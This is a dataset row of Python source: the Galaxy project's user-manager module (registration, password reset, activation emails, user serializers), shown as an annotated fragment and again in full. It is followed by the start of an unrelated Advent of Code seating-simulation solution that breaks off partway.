        # TODO: seems like this should return the model
        return api_keys.ApiKeyManager(self.app).create_api_key(user)

    # TODO: possibly move to ApiKeyManager
    def valid_api_key(self, user):
        """
        Return this most recent APIKey for this user or None if none have been created.
        """
        query = (self.session().query(model.APIKeys)
                 .filter_by(user=user)
                 .order_by(desc(model.APIKeys.create_time)))
        # NOTE(review): `all` shadows the builtin of the same name.
        all = query.all()
        if len(all):
            return all[0]
        return None

    # TODO: possibly move to ApiKeyManager
    def get_or_create_valid_api_key(self, user):
        """
        Return this most recent APIKey for this user or create one if none have been
        created.
        """
        existing = self.valid_api_key(user)
        if existing:
            return existing
        return self.create_api_key(self, user)

    # ---- preferences
    def preferences(self, user):
        # Copy the association proxy into a plain dict.
        return dict((key, value) for key, value in user.preferences.items())

    # ---- roles and permissions
    def private_role(self, user):
        return self.app.security_agent.get_private_user_role(user)

    def sharing_roles(self, user):
        return self.app.security_agent.get_sharing_roles(user)

    def default_permissions(self, user):
        return self.app.security_agent.user_get_default_permissions(user)

    def quota(self, user, total=False):
        # total=True gives a human-readable quota size, otherwise percent used.
        if total:
            return self.app.quota_agent.get_quota(user, nice_size=True)
        return self.app.quota_agent.get_percent(user=user)

    def tags_used(self, user, tag_models=None):
        """
        Return a list of distinct 'user_tname:user_value' strings that the
        given user has used.
        """
        # TODO: simplify and unify with tag manager
        if self.is_anonymous(user):
            return []
        # get all the taggable model TagAssociations
        if not tag_models:
            tag_models = [v.tag_assoc_class for v in self.app.tag_handler.item_tag_assoc_info.values()]
        # create a union of subqueries for each for this user - getting only the tname and user_value
        all_tags_query = None
        for tag_model in tag_models:
            subq = (self.session().query(tag_model.user_tname, tag_model.user_value)
                    .filter(tag_model.user == user))
            all_tags_query = subq if all_tags_query is None else all_tags_query.union(subq)
        # if nothing init'd the query, bail
        if all_tags_query is None:
            return []
        # boil the tag tuples down into a sorted list of DISTINCT name:val strings
        tags = all_tags_query.distinct().all()
        tags = [((name + ':' + val) if val else name) for name, val in tags]
        return sorted(tags)

    def change_password(self, trans, password=None, confirm=None, token=None, id=None, current=None):
        """
        Allows to change a user password with a token.

        Returns a ``(user, message)`` tuple; ``user`` is None on failure.
        """
        if not token and not id:
            return None, "Please provide a token or a user and password."
        if token:
            token_result = trans.sa_session.query(self.app.model.PasswordResetToken).get(token)
            if not token_result or not token_result.expiration_time > datetime.utcnow():
                return None, "Invalid or expired password reset token, please request a new one."
            user = token_result.user
            message = self.__set_password(trans, user, password, confirm)
            if message:
                return None, message
            # Expire the token immediately so it cannot be reused.
            token_result.expiration_time = datetime.utcnow()
            trans.sa_session.add(token_result)
            return user, "Password has been changed. Token has been invalidated."
        else:
            user = self.by_id(self.app.security.decode_id(id))
            if user:
                # Verify the current password before allowing the change.
                message = self.app.auth_manager.check_change_password(user, current)
                if message:
                    return None, message
                message = self.__set_password(trans, user, password, confirm)
                if message:
                    return None, message
                return user, "Password has been changed."
            else:
                return user, "User not found."

    def __set_password(self, trans, user, password, confirm):
        # Returns an error message string on failure, or None (implicitly) on success.
        if not password:
            return "Please provide a new password."
        if user:
            # Validate the new password
            message = validate_password(trans, password, confirm)
            if message:
                return message
            else:
                # Save new password
                user.set_password_cleartext(password)
                # Invalidate all other sessions
                if trans.galaxy_session:
                    for other_galaxy_session in trans.sa_session.query(self.app.model.GalaxySession) \
                            .filter(and_(self.app.model.GalaxySession.table.c.user_id == user.id,
                                         self.app.model.GalaxySession.table.c.is_valid == true(),
                                         self.app.model.GalaxySession.table.c.id != trans.galaxy_session.id)):
                        other_galaxy_session.is_valid = False
                        trans.sa_session.add(other_galaxy_session)
                trans.sa_session.add(user)
                trans.sa_session.flush()
                trans.log_event("User change password")
        else:
            return "Failed to determine user, access denied."

    def send_activation_email(self, trans, email, username):
        """
        Send the verification email containing the activation link to the user's email.

        Returns True on success, False if the mail could not be sent.
        """
        activation_token = self.__get_activation_token(trans, escape(email))
        activation_link = url_for(controller='user', action='activate', activation_token=activation_token, email=escape(email), qualified=True)
        host = self.__get_host(trans)
        body = ("Hello %s,\n\n"
                "In order to complete the activation process for %s begun on %s at %s, please click on the following link to verify your account:\n\n"
                "%s \n\n"
                "By clicking on the above link and opening a Galaxy account you are also confirming that you have read and agreed to Galaxy's Terms and Conditions for use of this service (%s). This includes a quota limit of one account per user. Attempts to subvert this limit by creating multiple accounts or through any other method may result in termination of all associated accounts and data.\n\n"
                "Please contact us if you need help with your account at: %s. You can also browse resources available at: %s. \n\n"
                "More about the Galaxy Project can be found at galaxyproject.org\n\n"
                "Your Galaxy Team" % (escape(username), escape(email),
                                      datetime.utcnow().strftime("%D"),
                                      trans.request.host, activation_link,
                                      self.app.config.terms_url,
                                      self.app.config.error_email_to,
                                      self.app.config.instance_resource_url))
        to = email
        frm = self.app.config.email_from or 'galaxy-no-reply@' + host
        subject = 'Galaxy Account Activation'
        try:
            util.send_mail(frm, to, subject, body, self.app.config)
            return True
        except Exception:
            log.debug(body)
            log.exception('Unable to send the activation email.')
            return False

    def __get_activation_token(self, trans, email):
        """
        Check for the activation token. Create new activation token and store it in the database if no token found.
        """
        user = trans.sa_session.query(self.app.model.User).filter(self.app.model.User.table.c.email == email).first()
        activation_token = user.activation_token
        if activation_token is None:
            # Derive a fresh token from 256 random bits.
            activation_token = util.hash_util.new_secure_hash(str(random.getrandbits(256)))
            user.activation_token = activation_token
            trans.sa_session.add(user)
            trans.sa_session.flush()
        return activation_token

    # NOTE(review): mutable default argument `payload={}` — shared across
    # calls; safe only while callers never mutate it.
    def send_reset_email(self, trans, payload={}, **kwd):
        """Reset the user's password. Send an email with token that allows a password change.

        Returns an error message string on failure, None (implicitly) on success.
        """
        if self.app.config.smtp_server is None:
            return "Mail is not configured for this Galaxy instance and password reset information cannot be sent. Please contact your local Galaxy administrator."
        email = payload.get("email")
        if not email:
            return "Please provide your email."
        message = validate_email(trans, email, check_dup=False)
        if message:
            return message
        else:
            reset_user, prt = self.get_reset_token(trans, email)
            if prt:
                host = self.__get_host(trans)
                reset_url = url_for(controller='root', action='login', token=prt.token)
                body = PASSWORD_RESET_TEMPLATE % (host, prt.expiration_time.strftime(trans.app.config.pretty_datetime_format),
                                                  trans.request.host, reset_url)
                frm = trans.app.config.email_from or 'galaxy-no-reply@' + host
                subject = 'Galaxy Password Reset'
                try:
                    util.send_mail(frm, email, subject, body, self.app.config)
                    trans.sa_session.add(reset_user)
                    trans.sa_session.flush()
                    trans.log_event('User reset password: %s' % email)
                except Exception as e:
                    log.debug(body)
                    return "Failed to submit email. Please contact the administrator: %s" % util.unicodify(e)
            else:
                return "Failed to produce password reset token. User not found."

    def get_reset_token(self, trans, email):
        # Returns (user, PasswordResetToken) or (None, None) when no user matches.
        reset_user = trans.sa_session.query(self.app.model.User).filter(self.app.model.User.table.c.email == email).first()
        if not reset_user:
            # Perform a case-insensitive check only if the user wasn't found
            reset_user = trans.sa_session.query(self.app.model.User).filter(func.lower(self.app.model.User.table.c.email) == func.lower(email)).first()
        if reset_user:
            prt = self.app.model.PasswordResetToken(reset_user)
            trans.sa_session.add(prt)
            trans.sa_session.flush()
            return reset_user, prt
        return None, None

    def __get_host(self, trans):
        # Strip any port; substitute the FQDN for loopback addresses so
        # emailed links are reachable from outside.
        host = trans.request.host.split(':')[0]
        if host in ['localhost', '127.0.0.1', '0.0.0.0']:
            host = socket.getfqdn()
        return host

    def send_subscription_email(self, email):
        """Send a join request to the configured mailing list address.

        Returns an error message string on failure, None (implicitly) on success.
        """
        if self.app.config.smtp_server is None:
            return "Subscribing to the mailing list has failed because mail is not configured for this Galaxy instance. Please contact your local Galaxy administrator."
        else:
            body = 'Join Mailing list.\n'
            to = self.app.config.mailing_join_addr
            frm = email
            subject = 'Join Mailing List'
            try:
                util.send_mail(frm, to, subject, body, self.app.config)
            except Exception:
                log.exception('Subscribing to the mailing list has failed.')
                return "Subscribing to the mailing list has failed."
class UserSerializer(base.ModelSerializer, deletable.PurgableSerializerMixin):
    """Serializes User models into dictionaries for the API ('summary' and
    'detailed' views)."""

    model_manager_class = UserManager

    def __init__(self, app):
        """
        Convert a User and associated data to a dictionary representation.
        """
        super(UserSerializer, self).__init__(app)
        self.user_manager = self.manager

        self.default_view = 'summary'
        self.add_view('summary', [
            'id', 'email', 'username'
        ])
        self.add_view('detailed', [
            # 'update_time',
            # 'create_time',
            'is_admin',
            'total_disk_usage',
            'nice_total_disk_usage',
            'quota_percent',
            'quota',
            'deleted',
            'purged',
            # 'active',
            'preferences',
            #  all tags
            'tags_used',
            # all annotations
            # 'annotations'
        ], include_keys_from='summary')

    def add_serializers(self):
        # Per-key serializer callables; each receives (item, key, **context).
        super(UserSerializer, self).add_serializers()
        deletable.PurgableSerializerMixin.add_serializers(self)
        self.serializers.update({
            'id' : self.serialize_id,
            'create_time' : self.serialize_date,
            'update_time' : self.serialize_date,
            'is_admin' : lambda i, k, **c: self.user_manager.is_admin(i),

            'preferences' : lambda i, k, **c: self.user_manager.preferences(i),

            'total_disk_usage' : lambda i, k, **c: float(i.total_disk_usage),
            'quota_percent' : lambda i, k, **c: self.user_manager.quota(i),
            'quota' : lambda i, k, **c: self.user_manager.quota(i, total=True),

            'tags_used' : lambda i, k, **c: self.user_manager.tags_used(i),
        })
class UserDeserializer(base.ModelDeserializer):
    """
    Service object for validating and deserializing dictionaries that
    update/alter users.
    """
    model_manager_class = UserManager

    def add_deserializers(self):
        super(UserDeserializer, self).add_deserializers()
        self.deserializers.update({
            'username' : self.deserialize_username,
        })

    def deserialize_username(self, item, key, username, trans=None, **context):
        """Validate a public username before applying it to the user.

        :raises base.ModelDeserializingError: when the name fails validation.
        """
        # TODO: validate_user_input requires trans and should(?) raise exceptions
        # move validation to UserValidator and use self.app, exceptions instead
        validation_error = validate_publicname(trans, username, user=item)
        if validation_error:
            raise base.ModelDeserializingError(validation_error)
        return self.default_deserializer(item, key, username, trans=trans, **context)
class CurrentUserSerializer(UserSerializer):
    """UserSerializer variant that also handles the anonymous (logged-out)
    session user."""

    model_manager_class = UserManager

    def serialize(self, user, keys, **kwargs):
        """
        Override to return at least some usage info if user is anonymous.
        """
        kwargs['current_user'] = user
        if self.user_manager.is_anonymous(user):
            return self.serialize_current_anonymous_user(user, keys, **kwargs)
        return super(UserSerializer, self).serialize(user, keys, **kwargs)

    def serialize_current_anonymous_user(self, user, keys, trans=None, **kwargs):
        """Serialize disk-usage/quota info for an anonymous session."""
        # use the current history if any to get usage stats for trans' anonymous user
        # TODO: might be better as sep. Serializer class
        usage = 0
        percent = None

        history = trans.history
        if history:
            usage = self.app.quota_agent.get_usage(trans, history=trans.history)
            percent = self.app.quota_agent.get_percent(trans=trans, usage=usage)

        # a very small subset of keys available
        values = {
            'id' : None,
            'total_disk_usage' : float(usage),
            'nice_total_disk_usage' : util.nice_size(usage),
            'quota_percent' : percent,
        }
        serialized = {}
        for key in keys:
            if key in values:
                serialized[key] = values[key]
        return serialized
class AdminUserFilterParser(base.ModelFilterParser, deletable.PurgableFiltersMixin):
    """Parses admin-only query filters (email, username, active, disk_usage)
    for listing users."""

    model_manager_class = UserManager
    model_class = model.User

    def _add_parsers(self):
        super(AdminUserFilterParser, self)._add_parsers()
        deletable.PurgableFiltersMixin._add_parsers(self)

        # PRECONDITION: user making the query has been verified as an admin
        self.orm_filter_parsers.update({
            'email' : {'op': ('eq', 'contains', 'like')},
            'username' : {'op': ('eq', 'contains', 'like')},
            'active' : {'op': ('eq')},
            'disk_usage' : {'op': ('le', 'ge')}
        })

        self.fn_filter_parsers.update({})
| 42.207972 | 402 | 0.61686 | import logging
import random
import socket
from datetime import datetime
from markupsafe import escape
from sqlalchemy import and_, desc, exc, func, true
from galaxy import (
exceptions,
model,
util
)
from galaxy.managers import (
api_keys,
base,
deletable
)
from galaxy.security.validate_user_input import validate_email, validate_password, validate_publicname
from galaxy.web import url_for
log = logging.getLogger(__name__)
PASSWORD_RESET_TEMPLATE = """
To reset your Galaxy password for the instance at %s use the following link,
which will expire %s.
%s%s
If you did not make this request, no action is necessary on your part, though
you may want to notify an administrator.
If you're having trouble using the link when clicking it from email client, you
can also copy and paste it into your browser.
"""
class UserManager(base.ModelManager, deletable.PurgableManagerMixin):
foreign_key_name = 'user'
# TODO: there is quite a bit of functionality around the user (authentication, permissions, quotas, groups/roles)
# most of which it may be unneccessary to have here
# TODO: incorp BaseAPIController.validate_in_users_and_groups
# TODO: incorp CreatesApiKeysMixin
# TODO: incorporate UsesFormDefinitionsMixin?
def __init__(self, app):
self.model_class = app.model.User
super(UserManager, self).__init__(app)
def register(self, trans, email=None, username=None, password=None, confirm=None, subscribe=False):
if not trans.app.config.allow_user_creation and not trans.user_is_admin:
message = "User registration is disabled. Please contact your local Galaxy administrator for an account."
if trans.app.config.error_email_to is not None:
message += " Contact: %s" % trans.app.config.error_email_to
return None, message
if not email or not username or not password or not confirm:
return None, "Please provide email, username and password."
message = "\n".join([validate_email(trans, email),
validate_password(trans, password, confirm),
validate_publicname(trans, username)]).rstrip()
if message:
return None, message
email = util.restore_text(email)
username = util.restore_text(username)
message, status = trans.app.auth_manager.check_registration_allowed(email, username, password)
if message:
return None, message
if subscribe:
message = self.send_subscription_email(email)
if message:
return None, message
user = self.create(email=email, username=username, password=password)
if self.app.config.user_activation_on:
self.send_activation_email(trans, email, username)
return user, None
def create(self, email=None, username=None, password=None, **kwargs):
self._error_on_duplicate_email(email)
user = self.model_class(email=email)
user.set_password_cleartext(password)
user.username = username
if self.app.config.user_activation_on:
user.active = False
else:
# Activation is off, every new user is active by default.
user.active = True
self.session().add(user)
try:
self.session().flush()
# TODO:?? flush needed for permissions below? If not, make optional
except exc.IntegrityError as db_err:
raise exceptions.Conflict(str(db_err))
# can throw an sqlalx.IntegrityError if username not unique
self.app.security_agent.create_private_user_role(user)
# We set default user permissions, before we log in and set the default history permissions
if hasattr(self.app.config, "new_user_dataset_access_role_default_private"):
permissions = self.app.config.new_user_dataset_access_role_default_private
self.app.security_agent.user_set_default_permissions(user, default_access_private=permissions)
return user
def delete(self, user):
user.deleted = True
self.session().add(user)
self.session().flush()
def _error_on_duplicate_email(self, email):
# TODO: remove this check when unique=True is added to the email column
if self.by_email(email) is not None:
raise exceptions.Conflict('Email must be unique', email=email)
# ---- filters
def by_email(self, email, filters=None, **kwargs):
filters = self._munge_filters(self.model_class.email == email, filters)
try:
# TODO: use one_or_none
return super(UserManager, self).one(filters=filters, **kwargs)
except exceptions.ObjectNotFound:
return None
def by_email_like(self, email_with_wildcards, filters=None, order_by=None, **kwargs):
filters = self._munge_filters(self.model_class.email.like(email_with_wildcards), filters)
order_by = order_by or (model.User.email, )
return super(UserManager, self).list(filters=filters, order_by=order_by, **kwargs)
# ---- admin
def is_admin(self, user, trans=None):
admin_emails = self._admin_emails()
if user is None:
# Anonymous session or master_api_key used, if master_api_key is detected
# return True.
rval = bool(trans and trans.user_is_admin)
return rval
return bool(admin_emails and user.email in admin_emails)
def _admin_emails(self):
return [email.strip() for email in self.app.config.get("admin_users", "").split(",")]
def admins(self, filters=None, **kwargs):
filters = self._munge_filters(self.model_class.email.in_(self._admin_emails()), filters)
return super(UserManager, self).list(filters=filters, **kwargs)
def error_unless_admin(self, user, msg="Administrators only", **kwargs):
# useful in admin only methods
if not self.is_admin(user, trans=kwargs.get("trans", None)):
raise exceptions.AdminRequiredException(msg, **kwargs)
return user
# ---- anonymous
def is_anonymous(self, user):
# define here for single point of change and make more readable
return user is None
def error_if_anonymous(self, user, msg="Log-in required", **kwargs):
if user is None:
# TODO: code is correct (401) but should be named AuthenticationRequired (401 and 403 are flipped)
raise exceptions.AuthenticationFailed(msg, **kwargs)
return user
# ---- current
def current_user(self, trans):
# define here for single point of change and make more readable
# TODO: trans
return trans.user
# ---- api keys
def create_api_key(self, user):
# TODO: seems like this should return the model
return api_keys.ApiKeyManager(self.app).create_api_key(user)
# TODO: possibly move to ApiKeyManager
def valid_api_key(self, user):
query = (self.session().query(model.APIKeys)
.filter_by(user=user)
.order_by(desc(model.APIKeys.create_time)))
all = query.all()
if len(all):
return all[0]
return None
# TODO: possibly move to ApiKeyManager
def get_or_create_valid_api_key(self, user):
existing = self.valid_api_key(user)
if existing:
return existing
return self.create_api_key(self, user)
# ---- preferences
def preferences(self, user):
return dict((key, value) for key, value in user.preferences.items())
# ---- roles and permissions
def private_role(self, user):
return self.app.security_agent.get_private_user_role(user)
def sharing_roles(self, user):
return self.app.security_agent.get_sharing_roles(user)
def default_permissions(self, user):
return self.app.security_agent.user_get_default_permissions(user)
def quota(self, user, total=False):
if total:
return self.app.quota_agent.get_quota(user, nice_size=True)
return self.app.quota_agent.get_percent(user=user)
def tags_used(self, user, tag_models=None):
# TODO: simplify and unify with tag manager
if self.is_anonymous(user):
return []
# get all the taggable model TagAssociations
if not tag_models:
tag_models = [v.tag_assoc_class for v in self.app.tag_handler.item_tag_assoc_info.values()]
# create a union of subqueries for each for this user - getting only the tname and user_value
all_tags_query = None
for tag_model in tag_models:
subq = (self.session().query(tag_model.user_tname, tag_model.user_value)
.filter(tag_model.user == user))
all_tags_query = subq if all_tags_query is None else all_tags_query.union(subq)
# if nothing init'd the query, bail
if all_tags_query is None:
return []
tags = all_tags_query.distinct().all()
tags = [((name + ':' + val) if val else name) for name, val in tags]
return sorted(tags)
def change_password(self, trans, password=None, confirm=None, token=None, id=None, current=None):
if not token and not id:
return None, "Please provide a token or a user and password."
if token:
token_result = trans.sa_session.query(self.app.model.PasswordResetToken).get(token)
if not token_result or not token_result.expiration_time > datetime.utcnow():
return None, "Invalid or expired password reset token, please request a new one."
user = token_result.user
message = self.__set_password(trans, user, password, confirm)
if message:
return None, message
token_result.expiration_time = datetime.utcnow()
trans.sa_session.add(token_result)
return user, "Password has been changed. Token has been invalidated."
else:
user = self.by_id(self.app.security.decode_id(id))
if user:
message = self.app.auth_manager.check_change_password(user, current)
if message:
return None, message
message = self.__set_password(trans, user, password, confirm)
if message:
return None, message
return user, "Password has been changed."
else:
return user, "User not found."
def __set_password(self, trans, user, password, confirm):
if not password:
return "Please provide a new password."
if user:
message = validate_password(trans, password, confirm)
if message:
return message
else:
user.set_password_cleartext(password)
if trans.galaxy_session:
for other_galaxy_session in trans.sa_session.query(self.app.model.GalaxySession) \
.filter(and_(self.app.model.GalaxySession.table.c.user_id == user.id,
self.app.model.GalaxySession.table.c.is_valid == true(),
self.app.model.GalaxySession.table.c.id != trans.galaxy_session.id)):
other_galaxy_session.is_valid = False
trans.sa_session.add(other_galaxy_session)
trans.sa_session.add(user)
trans.sa_session.flush()
trans.log_event("User change password")
else:
return "Failed to determine user, access denied."
def send_activation_email(self, trans, email, username):
    """Send the account-activation email for ``email``/``username``.

    Builds an activation link carrying the user's activation token and
    hands the message to the configured mail server.  Returns ``True``
    when the mail was handed off successfully, ``False`` otherwise.
    """
    # NOTE(review): the HTML-escaped email is also used for the token DB
    # lookup; presumably registered addresses never contain characters
    # that `escape` rewrites -- confirm against the email validator.
    activation_token = self.__get_activation_token(trans, escape(email))
    activation_link = url_for(controller='user', action='activate', activation_token=activation_token, email=escape(email), qualified=True)
    host = self.__get_host(trans)
    body = ("Hello %s,\n\n"
            "In order to complete the activation process for %s begun on %s at %s, please click on the following link to verify your account:\n\n"
            "%s \n\n"
            "By clicking on the above link and opening a Galaxy account you are also confirming that you have read and agreed to Galaxy's Terms and Conditions for use of this service (%s). This includes a quota limit of one account per user. Attempts to subvert this limit by creating multiple accounts or through any other method may result in termination of all associated accounts and data.\n\n"
            "Please contact us if you need help with your account at: %s. You can also browse resources available at: %s. \n\n"
            "More about the Galaxy Project can be found at galaxyproject.org\n\n"
            "Your Galaxy Team" % (escape(username), escape(email),
                                  datetime.utcnow().strftime("%D"),
                                  trans.request.host, activation_link,
                                  self.app.config.terms_url,
                                  self.app.config.error_email_to,
                                  self.app.config.instance_resource_url))
    to = email
    frm = self.app.config.email_from or 'galaxy-no-reply@' + host
    subject = 'Galaxy Account Activation'
    try:
        util.send_mail(frm, to, subject, body, self.app.config)
        return True
    except Exception:
        # Log the full body so the activation link stays recoverable.
        log.debug(body)
        log.exception('Unable to send the activation email.')
        return False
def __get_activation_token(self, trans, email):
    """Return the activation token for the account registered under
    ``email``, minting and persisting a fresh one when none exists yet."""
    user_model = self.app.model.User
    user = trans.sa_session.query(user_model).filter(user_model.table.c.email == email).first()
    token = user.activation_token
    if token is None:
        # First request for this account: derive a token from 256 random bits.
        token = util.hash_util.new_secure_hash(str(random.getrandbits(256)))
        user.activation_token = token
        trans.sa_session.add(user)
        trans.sa_session.flush()
    return token
def send_reset_email(self, trans, payload=None, **kwd):
    """Mail a password-reset link to the address supplied in ``payload``.

    :param payload: mapping holding the request body; only the ``email``
        key is read.
    :returns: ``None`` when the reset mail was handed off successfully,
        otherwise a user-facing error message.
    """
    # `payload` used to default to a mutable `{}`; default to None and
    # normalize here so a dict object is never shared between calls.
    if payload is None:
        payload = {}
    if self.app.config.smtp_server is None:
        return "Mail is not configured for this Galaxy instance and password reset information cannot be sent. Please contact your local Galaxy administrator."
    email = payload.get("email")
    if not email:
        return "Please provide your email."
    message = validate_email(trans, email, check_dup=False)
    if message:
        return message
    reset_user, prt = self.get_reset_token(trans, email)
    if not prt:
        return "Failed to produce password reset token. User not found."
    host = self.__get_host(trans)
    reset_url = url_for(controller='root', action='login', token=prt.token)
    body = PASSWORD_RESET_TEMPLATE % (host, prt.expiration_time.strftime(trans.app.config.pretty_datetime_format),
                                      trans.request.host, reset_url)
    frm = trans.app.config.email_from or 'galaxy-no-reply@' + host
    subject = 'Galaxy Password Reset'
    try:
        util.send_mail(frm, email, subject, body, self.app.config)
        trans.sa_session.add(reset_user)
        trans.sa_session.flush()
        trans.log_event('User reset password: %s' % email)
    except Exception as e:
        # Keep the reset link recoverable from the debug log.
        log.debug(body)
        return "Failed to submit email. Please contact the administrator: %s" % util.unicodify(e)
def get_reset_token(self, trans, email):
    """Find the user registered under ``email`` and mint a new
    PasswordResetToken for them.

    Returns ``(user, token)`` on success and ``(None, None)`` when no
    account matches the address.
    """
    user_model = self.app.model.User
    reset_user = trans.sa_session.query(user_model).filter(user_model.table.c.email == email).first()
    if not reset_user:
        # Fall back to a case-insensitive lookup only when the exact
        # match came up empty.
        reset_user = trans.sa_session.query(user_model).filter(func.lower(user_model.table.c.email) == func.lower(email)).first()
    if not reset_user:
        return None, None
    prt = self.app.model.PasswordResetToken(reset_user)
    trans.sa_session.add(prt)
    trans.sa_session.flush()
    return reset_user, prt
def __get_host(self, trans):
    """Return the hostname of the current request, substituting the fully
    qualified domain name when the request arrived on a loopback or
    wildcard address."""
    host, _, _ = trans.request.host.partition(':')
    if host in ('localhost', '127.0.0.1', '0.0.0.0'):
        host = socket.getfqdn()
    return host
def send_subscription_email(self, email):
    """Send a mailing-list join request on behalf of ``email``.

    Returns an error message on failure and ``None`` when the request was
    handed off successfully.
    """
    config = self.app.config
    if config.smtp_server is None:
        return "Subscribing to the mailing list has failed because mail is not configured for this Galaxy instance. Please contact your local Galaxy administrator."
    # The join request is sent *from* the subscriber's own address to the
    # list's join address.
    recipient = config.mailing_join_addr
    try:
        util.send_mail(email, recipient, 'Join Mailing List', 'Join Mailing list.\n', config)
    except Exception:
        log.exception('Subscribing to the mailing list has failed.')
        return "Subscribing to the mailing list has failed."
class UserSerializer(base.ModelSerializer, deletable.PurgableSerializerMixin):
    """Converts User model objects into API-facing dictionaries."""
    model_manager_class = UserManager

    def __init__(self, app):
        """Register the 'summary' and 'detailed' key views; summary is default."""
        super(UserSerializer, self).__init__(app)
        self.user_manager = self.manager
        self.default_view = 'summary'
        self.add_view('summary', ['id', 'email', 'username'])
        self.add_view('detailed', [
            'is_admin',
            'total_disk_usage',
            'nice_total_disk_usage',
            'quota_percent',
            'quota',
            'deleted',
            'purged',
            'preferences',
            'tags_used',
        ], include_keys_from='summary')

    def add_serializers(self):
        """Install per-key serializer callables on top of the inherited ones."""
        super(UserSerializer, self).add_serializers()
        deletable.PurgableSerializerMixin.add_serializers(self)
        self.serializers.update({
            'id': self.serialize_id,
            'create_time': self.serialize_date,
            'update_time': self.serialize_date,
            'is_admin': lambda item, key, **context: self.user_manager.is_admin(item),
            'preferences': lambda item, key, **context: self.user_manager.preferences(item),
            'total_disk_usage': lambda item, key, **context: float(item.total_disk_usage),
            'quota_percent': lambda item, key, **context: self.user_manager.quota(item),
            'quota': lambda item, key, **context: self.user_manager.quota(item, total=True),
            'tags_used': lambda item, key, **context: self.user_manager.tags_used(item),
        })
class UserDeserializer(base.ModelDeserializer):
    """Applies API payload values onto User models, validating as it goes."""
    model_manager_class = UserManager

    def add_deserializers(self):
        """Register the username handler on top of the base deserializers."""
        super(UserDeserializer, self).add_deserializers()
        self.deserializers['username'] = self.deserialize_username

    def deserialize_username(self, item, key, username, trans=None, **context):
        """Reject an invalid public username before storing it."""
        error = validate_publicname(trans, username, user=item)
        if error:
            raise base.ModelDeserializingError(error)
        return self.default_deserializer(item, key, username, trans=trans, **context)
class CurrentUserSerializer(UserSerializer):
    """Serializer for the user attached to the current session, which may
    be an anonymous (not-logged-in) user."""
    model_manager_class = UserManager

    def serialize(self, user, keys, **kwargs):
        """Serialize ``user``, handing anonymous users off to a reduced view."""
        kwargs['current_user'] = user
        if self.user_manager.is_anonymous(user):
            return self.serialize_current_anonymous_user(user, keys, **kwargs)
        # Deliberately skip UserSerializer here and dispatch to its base class.
        return super(UserSerializer, self).serialize(user, keys, **kwargs)

    def serialize_current_anonymous_user(self, user, keys, trans=None, **kwargs):
        """Serialize an anonymous user; only id/usage/quota keys exist."""
        # TODO: might be better as sep. Serializer class
        usage = 0
        percent = None
        if trans.history:
            usage = self.app.quota_agent.get_usage(trans, history=trans.history)
            percent = self.app.quota_agent.get_percent(trans=trans, usage=usage)
        available = {
            'id': None,
            'total_disk_usage': float(usage),
            'nice_total_disk_usage': util.nice_size(usage),
            'quota_percent': percent,
        }
        # Return only the requested keys that anonymous users actually have.
        return {key: available[key] for key in keys if key in available}
class AdminUserFilterParser(base.ModelFilterParser, deletable.PurgableFiltersMixin):
    """Parses filter query parameters for admin-only user listings."""
    model_manager_class = UserManager
    model_class = model.User

    def _add_parsers(self):
        """Register the ORM-level filters available to admin queries."""
        super(AdminUserFilterParser, self)._add_parsers()
        deletable.PurgableFiltersMixin._add_parsers(self)
        # PRECONDITION: user making the query has been verified as an admin
        self.orm_filter_parsers.update({
            'email': {'op': ('eq', 'contains', 'like')},
            'username': {'op': ('eq', 'contains', 'like')},
            # Bug fix: ('eq') is just the string 'eq', not a tuple, so
            # substring membership tests would also accept ops like 'e'.
            # Use a one-element tuple, consistent with the other entries.
            'active': {'op': ('eq',)},
            'disk_usage': {'op': ('le', 'ge')}
        })
        self.fn_filter_parsers.update({})
| true | true |
1c2cb830d024d7ea119b1306188a13f8ae5948df | 2,779 | py | Python | aoc_cas/aoc2020/day11.py | TedCassirer/advent-of-code | fb87dfdbb48b44f864337750aa58a809dcf72392 | [
"MIT"
] | 1 | 2020-11-30T19:17:50.000Z | 2020-11-30T19:17:50.000Z | aoc_cas/aoc2020/day11.py | TedCassirer/advent-of-code | fb87dfdbb48b44f864337750aa58a809dcf72392 | [
"MIT"
] | null | null | null | aoc_cas/aoc2020/day11.py | TedCassirer/advent-of-code | fb87dfdbb48b44f864337750aa58a809dcf72392 | [
"MIT"
] | null | null | null | FLOOR = "."
EMPTY = "L"     # an empty seat
OCCUPIED = "#"  # an occupied seat


def tick(grid, rule, seatsToConnected):
    """Advance the seating automaton one generation.

    :param grid: 2-D list of single-character cells.  Only the coordinates
        listed in ``seatsToConnected`` are recomputed; every other cell is
        carried over unchanged.  The input grid is left unmodified.
    :param rule: callable ``(currently_occupied, nearby_occupied) -> char``
        deciding a seat's next state.
    :param seatsToConnected: dict mapping each seat's ``(y, x)`` coordinate
        to the set of seat coordinates that influence it.
    :returns: tuple ``(new_grid, occupied_count)`` with the next generation
        and its number of occupied seats.

    (An unused computation of the grid dimensions was removed.)
    """
    newGrid = [row.copy() for row in grid]
    totalSeatOccupied = 0
    for coord, connected in seatsToConnected.items():
        nearbyOccupied = sum(grid[y][x] == OCCUPIED for y, x in connected)
        currentlyOccupied = grid[coord[0]][coord[1]] == OCCUPIED
        updatedSeat = rule(currentlyOccupied, nearbyOccupied)
        newGrid[coord[0]][coord[1]] = updatedSeat
        totalSeatOccupied += updatedSeat == OCCUPIED
    return newGrid, totalSeatOccupied
def part1(data):
    """AoC 2020 day 11, part 1.

    Run the seating automaton with plain 8-cell adjacency: an empty seat
    fills when it sees no occupied neighbour, an occupied seat empties at
    four or more.  Iterate until the occupied-seat count repeats and
    return that count.
    """
    grid = [list(line) for line in data.splitlines()]
    height, width = len(grid), len(grid[0])

    def adjacent_seats(y, x):
        # Every non-floor cell in the (up to) 8-cell neighbourhood of (y, x).
        found = set()
        for ny in range(max(0, y - 1), min(height, y + 2)):
            for nx in range(max(0, x - 1), min(width, x + 2)):
                if (ny, nx) != (y, x) and grid[ny][nx] != FLOOR:
                    found.add((ny, nx))
        return found

    def rule(occupied, nearby_occupied):
        if occupied:
            return EMPTY if nearby_occupied >= 4 else OCCUPIED
        return EMPTY if nearby_occupied > 0 else OCCUPIED

    connected = {
        (y, x): adjacent_seats(y, x)
        for y in range(height)
        for x in range(width)
        if grid[y][x] != FLOOR
    }
    counts_seen = set()
    occupied_count = 0
    while occupied_count not in counts_seen:
        counts_seen.add(occupied_count)
        grid, occupied_count = tick(grid, rule, connected)
    return occupied_count
def part2(data):
    """AoC 2020 day 11, part 2.

    Like part 1, but each seat sees the *first* seat along each of the 8
    rays (floor is looked through), and an occupied seat only empties at
    five or more visible occupied seats.
    """
    grid = [list(line) for line in data.splitlines()]
    height, width = len(grid), len(grid[0])
